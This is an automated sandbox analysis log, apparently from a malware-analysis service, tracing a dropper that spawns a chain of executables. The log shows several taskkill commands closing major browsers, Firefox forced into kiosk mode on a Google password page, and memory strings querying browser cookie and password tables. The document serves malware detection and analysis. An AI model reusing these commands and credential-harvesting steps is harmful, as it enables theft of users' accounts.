Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PJGT15Z82T6C2GQS.exe, 00000004.00000002.2518168701.000000000109E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
Source: file.exe, 00000000.00000003.2222688766.00000000053E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235384460.00000000053CD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222996695.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2912728196.0000000005820000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899319268.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898294047.000000000582E000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2912489758.000000000582D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: A94C1J5VAPFWM1J1FS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: PJGT15Z82T6C2GQS.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe "C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe "C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe"
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe "C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe "C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe "C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe "C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe "C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe"
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c4f454-c699-4a59-a93f-d65df88e5316} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2681e171110 socket
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe "C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001141001\num.exe "C:\Users\user\AppData\Local\Temp\1001141001\num.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe "C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe"
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe "C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3916 -parentBuildID 20230927232528 -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e53ce2-8518-4574-94e0-14e7cb60220b} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2682e880210 rdd
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe "C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe "C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe"
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001141001\num.exe "C:\Users\user\AppData\Local\Temp\1001141001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe "C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe "C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe "C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe "C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe "C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe "C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001141001\num.exe "C:\Users\user\AppData\Local\Temp\1001141001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe "C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe"
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe "C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe"
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Process created: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe "C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe"
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2c4f454-c699-4a59-a93f-d65df88e5316} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2681e171110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3916 -parentBuildID 20230927232528 -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8e53ce2-8518-4574-94e0-14e7cb60220b} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" 2682e880210 rdd
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Section loaded: ncrypt.dll Jump to behavior
